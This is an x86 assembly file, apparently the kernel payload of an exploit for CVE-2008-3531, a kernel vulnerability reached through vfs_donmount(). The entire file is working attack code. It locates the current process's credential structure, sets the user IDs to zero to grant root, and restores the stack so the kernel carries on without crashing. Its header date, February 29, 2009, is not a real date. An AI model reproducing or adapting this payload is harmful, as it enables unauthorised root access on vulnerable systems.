# cve-2008-3531-kernelcode.s
# Patroklos Argyroudis, argp at domain census-labs.com
#
# $Id: cve-2008-3531-kernelcode.s,v 935ec53ac86b 2009/02/29 10:50:03 argp $

.global _start
_start:

movl    %fs:0, %eax         # get curthread
movl    0x4(%eax), %eax     # get proc from curthread
movl    0x30(%eax), %eax    # get ucred from proc
xorl    %ecx, %ecx          # ecx = 0
movl    %ecx, 0x4(%eax)     # ucred.uid = 0
movl    %ecx, 0x8(%eax)     # ucred.ruid = 0

# return to the pre-previous function, i.e. vfs_donmount()
addl    $0xe8, %esp
popl    %ebx
popl    %esi
popl    %edi
popl    %ebp
ret

# EOF